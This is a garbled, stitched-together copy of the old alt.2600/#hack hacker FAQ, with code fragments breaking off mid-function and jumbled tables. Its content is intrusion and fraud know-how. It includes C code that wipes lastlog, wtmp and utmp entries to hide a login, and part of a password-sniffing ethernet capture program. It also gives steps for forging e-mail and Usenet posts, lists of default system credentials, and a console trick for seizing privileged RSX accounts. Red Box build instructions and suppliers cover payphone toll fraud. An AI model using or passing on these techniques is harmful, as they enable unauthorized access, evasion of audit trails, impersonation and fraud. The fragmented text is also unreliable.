HACKING
HACKING
HACKING
"The 2600 Hacker Guide" Section A: Computers 01. 02. 03. 04. 05. 06. 07. 08. 09.
10. 11. 12. 13. 14. 15. 16. 17. 18. 19. 20. 21. 22. 23. 24. 25. 26. 27. 28. 29.
30. 31. 32. 33. How do I access the password file under Unix? How do I crack Unix
passwords? What is password shadowing? Where can I find the password file if it's
shadowed? What is NIS/yp? What are those weird characters after the comma in my
passwd file? How do I access the password file under VMS? How do I crack VMS
passwords? How do I break out of a restricted shell? How do I gain root from a
suid script or program? How do I erase my presence from the system logs? How do I
send fakemail? How do I fake posts to UseNet? How do I hack ChanOp on IRC? How do
I modify the IRC client to hide my real username? How to I change to directories
with strange characters in them? What is ethernet sniffing? What is an Internet
Outdial? What are some Internet Outdials? What is this system? What are the
default accounts for XXX ? What port is XXX on? What is a trojan/worm/virus/logic
bomb? How can I protect myself from viruses and such? Where can I get more
information about viruses? What is Cryptoxxxxxxx? What is PGP? What is Tempest?
What is an anonymous remailer? What are the addresses of some anonymous remailers?
How do I defeat copy protection? What is 127.0.0.1? How do I post to a moderated
newsgroup?
U U U U U U N
Section B: Telephony 01. 02. 03. 04. 05. 06. 07. 08. 09. 10. 11. 12. What is a Red
Box? How do I build a Red Box? Where can I get a 6.5536Mhz crystal? Which
payphones will a Red Box work on? How do I make local calls with a Red Box? What
is a Blue Box? Do Blue Boxes still work? What is a Black Box? What do all the
colored boxes do? What is an ANAC number? What is the ANAC number for my area?
What is a ringback number?
U U U
U 13. 14. U 15. U 16. U 17. U 18. U 19. U 20. 21. 22. 23. 24. 25. 26. N 27. N 28.
N 29.
What is the ringback number for my area? What is a loop? What is a loop in my
area? What is a CNA number? What is the telephone company CNA number for my area?
What are some numbers that always ring busy? What are some numbers that
temporarily disconnect phone service? What is scanning? Is scanning illegal? Where
can I purchase a lineman's handset? What are the DTMF frequencies? What are the
frequencies of the telephone tones? What are all of the * (LASS) codes? What
frequencies do cordless phones operate on? What is Caller-ID? What is a PBX? What
is a VMB?
Section C: Resources U 01. What are some ftp sites of interest to hackers? N 02.
What are some fsp sites of interest to hackers? 03. What are some newsgroups of
interest to hackers? U 04. What are some telnet sites of interest to hackers? 05.
What are some gopher sites of interest to hackers? U 06. What are some World wide
Web (WWW) sites of interest to hackers? U 07. What are some IRC channels of
interest to hackers? U 08. What are some BBS's of interest to hackers? U 09. What
are some books of interest to hackers? N 10. What are some videos of interest to
hackers? U 11. What are some mailing lists of interest to hackers? 12. What are
some print magazines of interest to hackers? N 13. What are some e-zines of
interest to hackers? 14. What are some organizations of interest to hackers? U 15.
Where can I purchase a magnetic stripe encoder/decoder? 16. What are the rainbow
books and how can I get them? Section D: 2600 01. 02. 03. 04. 05. What is
alt.2600? What does "2600" mean? Are there on-line versions of 2600 available? I
can't find 2600 at any bookstores. What can I do? Why does 2600 cost more to
subscribe to than to buy at a newsstand?
Section E: Miscellaneous U 01. 02. 03. U 04. 05. What does XXX stand for? How do I
determine if I have a valid credit card number? What bank issued this credit card?
What are the ethics of hacking? Where can I get a copy of the alt.2600/#hack FAQ?
U == Updated since last release of the alt.2600/#hack FAQ N == New since last
release of the alt.2600/#hack FAQ
} }
void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if
((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f,
(long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof(
newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else
printf("%s: ?\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2)
{ kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]);
printf("Zap2!\n"); } else printf("Error.\n"); } 12. How do I send fakemail?
Telnet to port 25 of the machine you want the mail to appear to originate from.
Enter your message as in this example: HELO bellcore.com MAIL
FROM:[email protected] RCPT TO:[email protected] DATA . QUIT Please
discontinue your silly Clipper initiative.
On systems that have RFC 931 implemented, spoofing your "MAIL FROM:" line will not
work. Test by sending yourself fakemail first. For more information read RFC 822
"Standard for the format of ARPA Internet text messages." 13. How do I fake posts
to UseNet? Use inews to post. From: Newsgroups: Subject: Message-ID: Date:
Organization: For a moderated newsgroup, inews will also require this line:
Approved: Then add your post and terminate with <Control-D>. Example: From: Eric
S. Real Newsgroups: alt.hackers Subject: Pathetic bunch of wannabe losers Message-
ID: <[email protected]> Date: Fri, 13 Aug 1994 12:15:03 Organization: Moral
Majority A pathetic bunch of wannabe losers is what most of you are, with no right
to steal the honorable title of `hacker' to puff up your silly adolescent egos.
Get stuffed, get lost, and go to jail. Eric S. Real <[email protected]> ^D Note
that many systems will append an Originator: line to your message header,
effectively revealing the account from which the message was posted. Give inews
the following lines:
14. How do I hack ChanOp on IRC? Find a server that is split from the rest of IRC
and create your own channel there using the name of the channel you want ChanOp
on. When that server reconnects to the net, you will have ChanOp on the real
channel. If you have ServerOp on a server, you can cause it to split on purpose.
15. How do I modify the IRC client to hide my real username? Get the IRC client
from cs.bu.edu /irc/clients. Look at the source code files irc.c and ctcp.c. The
code you are looking for is fairly easy to spot. Change it. Change the username
code in irc.c and the ctcp information code in ctcp.c. Compile and run your
client. Here are the diffs from a sample hack of the IRC client. Your client code
will vary slightly depending on what IRC client version you are running. ***
ctcp.c.old Wed Feb 10 10:08:05 1993 --- ctcp.c Fri Feb 12 04:33:55 1993
*************** *** 331,337 **** struct passwd *pwd; long diff; int uid; ! char c;
/* * sojge complained that ircII says 'idle 1 seconds' --- 331,337 ---struct
passwd *pwd; long diff; int uid; ! char c, *fing; /* * sojge complained that ircII
says 'idle 1 seconds' *************** *** 348,354 **** if (uid != DAEMON_UID)
{ #endif /* DAEMON_UID */ ! if (pwd = getpwuid(uid)) { char *tmp; --- 348,356 ---
if (uid != DAEMON_UID) { #endif /* DAEMON_UID */ ! if (fing = getenv("IRCFINGER"))
! send_ctcp_reply(from, ctcp->name, fing, diff, c); ! else if (pwd =
getpwuid(uid)) {
char
*tmp;
*** irc.c.old Wed Feb 10 06:33:11 1993 --- irc.c Fri Feb 12 04:02:11 1993
*************** *** 510,516 **** malloc_strcpy(&my_path, "/"); if (*realname ==
null(char)) strmcpy(realname, "*Unknown*", REALNAME_LEN); ! if (*username ==
null(char)) { if (ptr = getenv("USER")) strmcpy(username, ptr, NAME_LEN); ---
510,518 ---malloc_strcpy(&my_path, "/"); if (*realname == null(char))
strmcpy(realname, "*Unknown*", REALNAME_LEN); ! if (ptr = getenv("IRCUSER")) !
strmcpy(username, ptr, NAME_LEN); ! else if (*username == null(char)) { if (ptr =
getenv("USER")) strmcpy(username, ptr, NAME_LEN); 16. How to I change to
directories with strange characters in them? These directories are often used by
people trying to hide information, most often warez (commercial software). There
are several things you can do to determine what these strange characters are. One
is to use the arguments to the ls command that cause ls to give you more
information: From the man page for ls: -F Causes directories to be marked with a
trailing ``/'', executable files to be marked with a trailing ``*'', and symbolic
links to be marked with a trailing ``@'' symbol. Forces printing of non-graphic
characters in filenames as the character ``?''. Forces printing of non-graphic
characters in the \ddd notation, in octal.
-q -b
Perhaps the most useful tool is to simply do an "ls -al filename" to save the
directory of the remote ftp site as a file on your local machine. Then you can do
a "cat -t -v -e filename" to see exactly what those bizarre little characters are.
From the man page for cat: -v Causes non-printing characters (with the exception
of tabs, newlines, and form feeds) to be displayed. Control characters are
displayed as ^X (<Ctrl>x), where X is the key pressed with the <Ctrl> key (for
example, <Ctrl>m is displayed as ^M). The <Del> character (octal 0177) is printed
as ^?. Non-ASCII
characters (with the high bit set) are printed as M -x, where x is the character
specified by the seven low order bits. -t -e Causes tabs to be printed as ^I and
form feeds as ^L. option is ignored if the -v option is not specified. This
Causes a ``$'' character to be printed at the end of each line (prior to the new-
line). This option is ignored if the -v option is not set.
If the directory name includes a <SPACE> or a <TAB> you will need to enclose the
entire directory name in quotes. Example: cd "..<TAB>" On an IBM-PC, you may enter
these special characters by holding down the <ALT> key and entering the decimal
value of the special character on your numeric keypad. When you release the <ALT>
key, the special character should appear on your screen. An ASCII chart can be
very helpful. Sometimes people will create directories with some of the standard
stty control characters in them, such as ^Z (suspend) or ^C (intr). To get into
those directories, you will first need to user stty to change the control
character in qustion to another character. From the man page for stty: Control
assignments control-character C Sets control-character to C, where control-
character is erase, kill, intr (interrupt), quit, eof, eol, swtch (switch), start,
stop or susp. start and stop are available as possible control characters for the
control-character C assignment. If C is preceded by a caret (^) (escaped from the
shell), then the value used is the corresponding control character (for example,
^D is a <Ctrl>d; ^? is interpreted as DELETE and ^- is interpreted as undefined).
Use the stty -a command to see your current stty settings, and to determine which
one is causing you problems. 17. What is ethernet sniffing? Ethernet sniffing is
listening (with software) to the raw ethernet device for packets that interest
you. When your software sees a packet that fits certain criteria, it logs it to a
file. The most common criteria for an interesting packet is one that contains
words like "login" or "password." Many ethernet sniffers are available, here are a
few that may be on your system now:
OS ~~ HP/UX Irix SunOS Solaris DOS
& netfmt (display) /* Available via anonymous ftp /* Available via anonymous ftp
/* Available via anonymous ftp /* Available via anonymous ftp as /* ethld104.zip
/* Available via anonymous ftp
*/ */ */ */ */ */
Macintosh
Etherpeek
}
/* ugh, gotta do an alignment :-( */ bcopy(cp + SZETH, (char *)Packet,(int)(pktlen
- SZETH)); ip = (struct ip *)Packet; if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp
pkts */ return; tcph = (struct tcphdr *)(Packet + IPHLEN); if(!( (TCPD ==
IPPORT_TELNET) || (TCPD == IPPORT_LOGINSERVER) || (TCPD == IPPORT_FTP) )) return;
{ register struct CREC *CLm; register int length = ((IPLEN - (IPHLEN * 4)) -
(TCPOFF * 4)); register u_char *p = (u_char *)Packet; p += ((IPHLEN * 4) + (TCPOFF
* 4)); if(debug) { fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph-
>th_flags),length); fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD)); } if( CLm = GET_NODE(IPS,
TCPS, IPD, TCPD) ) { CLm->PKcnt++; if(length>0) if( (CLm->Length + length) <
MAXBUFLEN ) { ADDDATA_NODE( CLm, p,length); } else { END_NODE( CLm, p,length,
"DATA LIMIT"); } if(TCPFL(TH_FIN|TH_RST)) { END_NODE( CLm, (u_char
*)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" ); } } else { if(TCPFL(TH_SYN))
{ ADD_NODE(IPS,IPD,TCPS,TCPD,p,length); } } IDLE_NODE(); } } /* signal handler */
void death() { register struct CREC *CLe;
while(CLe=CLroot) END_NODE( CLe, (u_char *)NULL,0, "SIGNAL"); fprintf(LOG,"\nLog
ended at => %s\n",NOWtm()); fflush(LOG); if(LOG != stdout) fclose(LOG); exit(1); }
/* opens network interface, performs ioctls and reads from it, * passing data to
filter function */ void do_it() { int cc; char *buf; u_short sp_ts_len;
if(!(buf=malloc(CHUNKSIZE))) Pexit(1,"Eth: malloc"); /* this /dev/nit
initialization code pinched from etherfind */ { struct strioctl si; struct ifreq
ifr; struct timeval timeout; u_int chunksize = CHUNKSIZE; u_long if_flags =
NI_PROMISC; if((if_fd = open(NIT_DEV, O_RDONLY)) < 0) Pexit(1,"Eth: nit open");
if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0) Pexit(1,"Eth: ioctl (I_SRDOPT)");
si.ic_timout = INFTIM; if(ioctl(if_fd, I_PUSH, "nbuf") < 0) Pexit(1,"Eth: ioctl
(I_PUSH \"nbuf\")"); timeout.tv_sec = 1; timeout.tv_usec = 0; si.ic_cmd =
NIOCSTIME; si.ic_len = sizeof(timeout); si.ic_dp = (char *)&timeout;
if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");
si.ic_cmd = NIOCSCHUNK; si.ic_len = sizeof(chunksize); si.ic_dp = (char
*)&chunksize; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR:
NIOCSCHUNK)"); strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
si.ic_cmd = NIOCBIND; si.ic_len = sizeof(ifr); si.ic_dp = (char *)𝔦
if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");
si.ic_cmd = NIOCSFLAGS; si.ic_len = sizeof(if_flags); si.ic_dp = (char
*)&if_flags; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR:
NIOCSFLAGS)"); if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0) Pexit(1,"Eth: ioctl
(I_FLUSH)"); while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) { register char *bp =
buf, *bufstop = (buf + cc); while (bp < bufstop) { register char *cp = bp;
register struct nit_bufhdr *hdrp; hdrp = (struct nit_bufhdr *)cp; cp +=
sizeof(struct nit_bufhdr); bp += hdrp->nhb_totlen; filter(cp, (u_long)hdrp-
>nhb_msglen);
} } Pexit((-1),"Eth: read"); }
*/ void main(argc, argv) int argc; char **argv; { char cbuf[BUFSIZ]; struct ifconf
ifc; int s, ac=1, backg=0; ProgName=argv[0];
/*
modem.uwyo.edu 35.1.1.6
Conclusion ---------If you find any of the outdials to have gone dead, changed
commands, or require password, please let us know so we can keep this list as
accurate as possible. If you would like to add to the list, feel free to mail us
and it will be included in future versions of this list, with your name beside it.
Have fun... [Editors note: Updates have been made to this document after the
original publication] 20. What is this system? AIX ~~~ IBM AIX Version 3 for RISC
System/6000 (C) Copyrights by IBM and by others 1982, 1990. login: [You will know
an AIX system because it is the only Unix system that] [clears the screen and
issues a login prompt near the bottom of the] [screen] AS/400
~~~~~~ UserID? Password? Once in, type GO MAIN CDC Cyber ~~~~~~~~~ WELCOME TO THE
NOS SOFTWARE SYSTEM. COPYRIGHT CONTROL DATA 1978, 1987. 88/02/16. 02.36.53.
N265100 CSUS CYBER 170-730. FAMILY: NOS 2.5.2-678/3. Next prompt is:
You would normally just hit return at the family prompt. USER NAME: CISCO Router
~~~~~~~~~~~~ FIRST BANK OF TNO 95-866 TNO VirtualBank REMOTE Router - TN043R1
Console Port SN - 00000866 TN043R1>
(CIERR 1424)
~~~ WELCOME TO CITIBANK. PLEASE SIGN ON. XXXXXXXX @ PASSWORD = @ =-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-= PLEASE ENTER YOUR ID:-1-> PLEASE ENTER YOUR PASSWORD:-2->
CITICORP (CITY NAME). KEY GHELP FOR HELP. XXX.XXX PLEASE SELECT SERVICE REQUIRED.-
3-> Lantronix Terminal Server ~~~~~~~~~~~~~~~~~~~~~~~~~ Lantronix ETS16 Version
V3.1/1(940623) Type HELP at the 'Local_15> ' prompt for assistance. Login
password> Meridian Mail (Northern Telecom Phone/Voice Mail System)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ MMM MM#MERIDIAN MMMMM
MMMMM MMMMMM MMMMMM MMM MMMMM MMM MMMMM MMMMM MMM MMM MMM MMMMMM MMMMMM MMM MMM
MMM MMM MMM MMM MMM MMM MMM MMMMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM
MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM Copyright (c) Northern
Telecom, 1991 Novell ONLAN ~~~~~~~~~~~~ #N [To access the systems it is best to
own a copy of ONLAN/PC] PC-Anywhere ~~~~~~~~~~~ #P
[To access the systems it is best to own a copy of PCAnywhere Remote] PRIMOS
~~~~~~ PRIMENET 19.2.7F PPOA1 <any text> ER! =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-= CONNECT Primenet V 2.3 LOGIN User id? SAPB5 Password? DROWSAP OK, (system)
(you) (system) (you) (system) (you) (system)
ROLM CBX II ~~~~~~~~~~~ ROLM CBXII RELEASE 9004.2.34 RB295 9000D IBMHO27568 BIND
DATE: 7/APR/93 COPYRIGHT 1980, 1993 ROLM COMPANY. ALL RIGHTS RESERVED. ROLM IS A
REGISTERED TRADEMARK AND CBX IS A TRADEMARK OF ROLM COMPANY. YOU HAVE ENTERED CPU
1 12:38:47 ON WEDNESDAY 2/15/1995 USERNAME: op PASSWORD: INVALID USERNAME-PASSWORD
PAIR ROLM-OSL ~~~~~~~~ MARAUDER10292 RELEASE 8003 OSL, PLEASE. ?
01/09/85(^G) 1 03/10/87
00:29:47
System75 ~~~~~~~~ Login: root INCORRECT LOGIN Login: browse Password: Software
Version: G3s.b16.2.2 Terminal Type (513, 4410, 4425): [513]
Tops-10 ~~~~~~~ NIH Timesharing NIH Tri-SMP 7.02-FF 16:30:04 TTY11 system
1378/1381/1453 Connected to Node Happy(40) Line # 12 Please LOGIN . VM/370 ~~~~~~
VM/370 ! VM/ESA ~~~~~~ VM/ESA ONLINE TBVM2 VM/ESA Rel 1.1 Fill in your USERID and
PASSWORD and press ENTER (Your password will not appear when you type it) USERID
===> PASSWORD ===> COMMAND ===> PUT 9200
guest
HPUNSUP or SUPPORT or HP
MGR MGR MANAGER MGR FIELD MANAGER MGR PCUSER RSBCMON OPERATOR OPERATOR FIELD
OPERATOR MANAGER MAIL MANAGER MGR SYS MGE MGE MGR MGR
RJE ROBELLE SECURITY SECURITY SERVICE SYS SYS SYS SYS SYS SYSTEM SUPPORT SUPPORT
TCH TELESUP TELESUP TELESUP TELESUP VESOFT VESOFT WORD XLSERVER
Common jobs are Pub, Sys, Data Common passwords are HPOnly, TeleSup, HP, MPE,
Manager, MGR, Remote Major BBS ~~~~~~~~~ Sysop Mitel PBX ~~~~~~~~~ SYSTEM NeXTSTEP
~~~~~~~~ root signa
Sysop
NeXT signa
PhoneMail Defaults sysadmin tech poll RSX ~~~ SYSTEM/SYSTEM 1,1/system BATCH/BATCH
SYSTEM/MANAGER USER/USER sysadmin tech tech
Default accounts for Micro/RSX: MICRO/RSX Alternately you can hit <CTRL-Z> when
the boot sequence asks you for the date and create an account using: or RUN ACNT
RUN $ACNT
(Numbers below 10 {oct} are Priveleged) Reboot and wait for the date/time
question. Type ^C and at the MCR prompt, type "abo at." You must include the .
dot! If this works, type "acs lb0:/blks=1000" to get some swap space so the new
step won't wedge. type " run $acnt" and change the password of any account with a
group number of 7 or less. You may find that the ^C does not work. Try ^Z and ESC
as well. Also try all 3 as terminators to valid and invalid times. If none of the
above work, use the halt switch to halt the system, just after a invalid date-
time. Look for a user mode PSW 1[4-7]xxxx. then deposit 177777 into R6, cross your
fingers, write protect the drive
and continue the system. This will hopefully result in indirect blowing up... And
hopefully the system has not been fully secured. SGI Irix ~~~~~~~~ 4DGifts guest
demos lp nuucp tour tutor System 75 ~~~~~~~~~ bcim bciim bcms bcnas blue browse
craft cust enquiry field inads init kraft locate maint nms rcust support tech Taco
Bell ~~~~~~~~~ rgm tacobell
bcimpw bciimpw bcmspw, bcms bcnspw bluepw looker, browsepw crftpw, craftpw, crack
custpw enquirypw support indspw, inadspw, inads initpw kraftpw locatepw maintpw,
rwmaint nmspw rcustpw supportpw field
rollout <null>
Verifone Junior 2.05 ~~~~~~~~~~~~~~~~~~~~ Default password: 166816 VMS ~~~ field
systest
service utep
This FAQ answer was written by Theora: Trojan: Remember the Trojan Horse? Bad guys
hid inside it until they could get into the city to do their evil deed. A trojan
computer program is similar. It is a program which does an unauthorized function,
hidden inside an authorized program. It does something other than what it claims
to do, usually something malicious (although not necessarily!), and it is intended
by the author to do whatever it does. If it's not intentional, its called a 'bug'
or, in some cases, a feature :) Some virus scanning programs detect some trojans.
Some virus scanning programs don't detect any trojans. No virus scanners detect
all trojans. Virus: A virus is an independent program which reproduces itself. It
may attach to other programs, it may create copies of itself (as in companion
viruses). It may damage or corrupt data, change data, or degrade the performance
of your system by utilizing resources such as memory or disk space. Some virus
scanners detect some viruses. No virus scanners detect all viruses. No virus
scanner can protect against "any and all viruses, known and unknown, now and
forevermore". Worm: Made famous by Robert Morris, Jr. , worms are programs which
reproduce by copying themselves over and over, system to system, using up
resources and sometimes slowing down the systems. They are self contained and use
the networks to spread, in much the same way viruses use files to spread. Some
people say the solution to viruses and worms is to just not have any files or
networks. They are probably correct. We would include computers. Logic Bomb: Code
which will trigger a particular form of 'attack' when a designated condition is
met. For instance, a logic bomb could delete all files on Dec. 5th. Unlike a
virus, a logic bomb does not make copies of itself. 24. How can I protect myself
from viruses and such?
02. How do I build a Red Box? Red boxes are commonly manufactured from modified
Radio Shack tone dialers, Hallmark greeting cards, or made from scratch from
readily available electronic components. To make a Red Box from a Radio Shack 43-
141 or 43-146 tone dialer, open the dialer and replace the crystal with a new one.
The purpose of the new crystal is to cause the * button on your tone dialer to
create a 1700Mhz and 2200Mhz tone instead of the original 941Mhz and 1209Mhz
tones. The exact value of the replacement crystal should be 6.466806 to create a
perfect 1700Mhz tone and 6.513698 to create a perfect 2200mhz tone. A crystal
close to those values will create a tone that easily falls within the loose
tolerances of ACTS. The most popular choice is the 6.5536Mhz crystal, because it
is the eaiest to procure. The old crystal is the large shiny metal component
labeled "3.579545Mhz." When you are finished replacing the crystal, program the P1
button with five *'s. That will simulate a quarter tone each time you press P1.
03. Where can I get a 6.5536Mhz crystal? Your best bet is a local electronics
store. Radio Shack sells them, but they are overpriced and the store must order
them in. This takes approximately two weeks. In addition, many Radio Shack
employees do not know that this can be done. Or, and the S&H the you could order
the crystal mail order. This introduces Shipping Handling charges, which are
usually much greater than the price of crystal. It's best to get several people
together to share the cost. Or, buy five or six yourself and sell them later. Some
of places you can order crystals are:
Digi-Key 701 Brooks Avenue South P.O. Box 677 Thief River Falls, MN 56701-0677
(80)344-4539 Part Number:X415-ND Part Number:X018-ND JDR Microdevices: 2233
Branham Lane San Jose, CA 95124 (800)538-5000 Part Number: 6.5536MHZ
Tandy Express Order Marketing 401 NE 38th Street Fort Worth, TX 76106 (800)241-
8742 Part Number: 10068625 Alltronics 2300 Zanker Road San Jose CA 95131 (408)943-
9774 Voice (408)943-9776 Fax (408)943-0622 BBS Part Number: 92A057 Mouser
(800)346-6873 Part Number: 332-1066 04. Which payphones will a Red Box work on?
Red Boxes will work on TelCo owned payphones, but not on COCOT's (Customer Owned
Coin Operated Telephones). Red boxes work by fooling ACTS (Automated Coin Toll
System) into believing you have put money into the pay phone. ACTS is the
telephone company software responsible for saying "Please deposit XX cents" and
listening for the coins being deposited. COCOT's do not use ACTS. On a COCOT, the
pay phone itself is responsible for determining what coins have been inserted. 05.
How do I make local calls with a Red Box? Payphones do not use ACTS for local
calls. To use your red box for local calls, you have to fool ACTS into getting
involved in the call. One way to do this, in some areas, is by dialing 10288-xxx-
xxxx. makes your call a long distance call, and brings ACTS into the picture. This
In other areas, you can call Directory Assistance and ask for the number of the
person you are trying to reach. The operator will give you the number and then you
will hear a message similar to "Your call can be completed automatically for an
additional 35 cents." When this happens, you can then use ACTS tones.
06. What is a Blue Box? Blue boxes use a 2600hz tone to size control of telephone
switches that use in-band signalling. The caller may then access special switch
functions, with the usual purpose of making free long distance phone calls, using
the tones provided by the Blue Box. 07. Do Blue Boxes still work? Blue Boxes still
work in areas using in band signalling. Modern phone switches use out of band
signalling. Nothing you send over the voice portion of bandwidth can control the
switch. If you are in an area served by a switch using out of band signalling, you
can still blue box by calling through an area served by older in-band equipment.
08. What is a Black Box? A Black Box is a 1.8k ohm resistor placed across your
phone line to cause the phone company equipment to be unable to detect that you
have answered your telephone. People who call you will then not be billed for the
telephone call. Black boxes do not work under ESS. 09. What do all the colored
boxes do? Acrylic Aqua Beige Black Blast Blotto Blue Brown Bud Chartreuse Cheese
Chrome Clear Color Copper Crimson Dark Dayglo Divertor DLOC Gold Green Infinity
Jack Light Lunch Steal Three-Way-Calling, Call Waiting and programmable Call
Forwarding on old 4-wire phone systems Drain the voltage of the FBI lock-in-
trace/trap-trace Lineman's hand set Allows the calling party to not be billed for
the call placed Phone microphone amplifier Supposedly shorts every fone out in the
immediate area Emulate a true operator by seizing a trunk with a 2600hz tone
Create a party line from 2 phone lines Tap into your neighbors phone line Use the
electricity from your phone line Connect two phones to create a diverter
Manipulate Traffic Signals by Remote Control A telephone pickup coil and a small
amp used to make free calls on Fortress Phones Line activated telephone recorder
Cause crosstalk interference on an extender Hold button Re-route outgoing or
incoming calls to another phone Connect to your neighbors phone line Re-route
outgoing or incoming calls to another phone Create a party line from 2 phone lines
Dialout router Emulate the Coin Collect, Coin Return, and Ringback tones Remotely
activated phone tap Touch-Tone key pad In-use light AM transmitter
Magenta Mauve Neon Noise Olive Party Pearl Pink Purple Rainbow Razz Red Rock
Scarlet Silver Static Switch Tan Tron TV Cable Urine Violet White Yellow
Connect a remote phone line to another remote phone line Phone tap without cutting
into a line External microphone Create line noise External ringer Create a party
line from 2 phone lines Tone generator Create a party line from 2 phone lines
Telephone hold button Kill a trace by putting 120v into the phone line (joke) Tap
into your neighbors phone Make free phone calls from pay phones by generating
quarter tones Add music to your phone line Cause a neighbors phone line to have
poor reception Create the DTMF tones for A, B, C and D Keep the voltage on a phone
line high Add hold, indicator lights, conferencing, etc.. Line activated telephone
recorder Reverse the phase of power to your house, causing your electric meter to
run slower "See" sound waves on your TV Create a capacitative disturbance between
the ring and tip wires in another's telephone headset Keep a payphone from hanging
up Portable DTMF keypad Add an extension phone
10. What is an ANAC number? An ANAC (Automatic Number Announcement Circuit) number
is a telephone number that plays back the number of the telephone that called it.
ANAC numbers are convenient if you want to know the telephone number of a pair of
wires. 11. What is the ANAC number for my area? How to find your ANAC number: Look
up your NPA (Area Code) fails, try 1 plus the number common numbers like 311, 958
number for your area, please and try the number listed for it. If that listed for
it. If that fails, try the and 200-222-2222. If you find the ANAC let us know.
Note that many times the ANAC number will vary for different switches in the same
city. The geographic naming on the list is NOT intended to be an accurate
reference for coverage patterns, it is for convenience only. Many companies
operate 800 number services which will read back to you
the number from which you are calling. Many of these require navigating a series
of menus to get the phone number you are looking for. (800)238-4959 (800)328-2630
(800)568-3197 (800)571-8859 (800)692-6447 N (800)455-3256 A voice mail system A
phone sex line Info Access Telephone Company's Automated Blocking Line A phone sex
line (800)MY-ANI-IS Unknown
An non-800 ANAC that works nationwide is 404-988-9664. The one catch with this
number is that it must be dialed with the AT&T Carrier Access Code 10732. Another
non-800 nationwide ANAC is Glen Robert of Full Disclosure Magazine's number,
10555-1-708-356-9646. Please use local ANAC numbers if you can, as abuse or
overuse kills 800 ANAC numbers. NPA --201 202 203 205 205 205 205 205 205 205 205
205 205 206 207 209 209 212 213 213 213 213 213 213 214 214 214 214 215 215 215
216 216 217 219 ANAC number --------------958 811 970 300-222-2222 300-555-5555
300-648-1111 300-765-4321 300-798-1111 300-833-3333 557-2311 811 841-1111 908-222-
2222 411 958 830-2121 211-9779 958 114 1223 211-2345 211-2346 760-2??? 61056 570
790 970-222-2222 970-611-1111 410-xxxx 511 958 331 959-9892 200-xxx-xxxx 550
Geographic area --------------------------------------------Hackensack/Jersey
City/Newark/Paterson, NJ District of Columbia CT Birmingham, AL Many small towns
in AL Dora, AL Bessemer, AL Forestdale, AL Birmingham Birmingham, AL Pell
City/Cropwell/Lincoln, AL Tarrant, AL Birmingham, AL WA (Not US West) ME Stockton,
CA Stockton, CA Manhattan, NY Los Angeles, CA (GTE) Los Angeles, CA (Some 1AESS
switches) Los Angeles, CA (English response) Los Angeles, CA (DTMF response) Los
Angeles, CA (DMS switches) Los Angeles, CA Dallas, TX Dallas, TX (GTE) Dallas, TX
Dallas, TX (Southwestern Bell) Philadelphia, PA Philadelphia, PA Philadelphia, PA
Akron/Canton/Cleveland/Lorain/Youngstown, OH
Akron/Canton/Cleveland/Lorain/Youngstown, OH Champaign-Urbana/Springfield, IL
Gary/Hammond/Michigan City/Southbend, IN
N N N N N N N N N
N N
219 301 310 310 310 310 312 312 312 312 313 313 313 313 314 315 315 315 317 317
317 401 401 402 404 404 404 405 405 407 408 408 408 409 409 410 410 410 412 412
412 413 413 414 415 415 415 415 415 415 419 502 502 503 503 504 504 504
559 958-9968 114 1223 211-2345 211-2346 200 290 1-200-8825 1-200-555-1212 200-200-
2002 200-222-2222 200-xxx-xxxx 200200200200200 410-xxxx# 953 958 998 310-222-2222
559-222-2222 743-1218 200-200-4444 222-2222 311 311 940-xxx-xxxx 990 890-7777777
897 200-222-2222 300-xxx-xxxx 760 940 951 970-xxxx 200-6969 200-555-1212 811 711-
6633 711-4411 999-xxxx 958 200-555-5555 330-2234 200-555-1212 211-2111 2222 640
760-2878 7600-2222 311 2002222222 997-555-1212 611 999 99882233 201-269-1111 998
N N N N N N
504 508 508 508 508 509 512 512 515 515 516 516 517 517 518 518 603 606 606 607
609 610 612 614 614 615 615 615 616 617 617 617 617 617 618 618 619 703 704 708
708 708 708 708 713 713 713 714 714 714 716 716 717 718 802 802 802 802
99851-0000000000 958 200-222-1234 200-222-2222 26011 560 830 970-xxxx 5463 811 958
968 200-222-2222 200200200200200 997 998 200-222-2222 997-555-1212 711 993 958 958
511 200 571 200200200200200 2002222222 830 200-222-2222 200-222-1234 200-222-2222
200-444-4444 220-2622 958 200-xxx-xxxx 930 211-2001 811 311 1-200-555-1212 1-200-
8825 200-6153 724-9951 356-9646 380 970-xxxx 811 114 211-2121 211-2222 511 990 958
958 2-222-222-2222 200-222-2222 1-700-222-2222 111-2222
Canada: 204 644-xxxx 306 115 403 311 403 908-222-2222 403 999 416 997-xxxx N 506
1-555-1313 514 320-xxxx 519 320-xxxx 604 1116 604 1211 604 211 613 320-2232 705
320-4567 Australia: +61 03-552-4111 +612 19123 United Kingdom: 175
12. What is a ringback number? A ringback number is a number that you call that
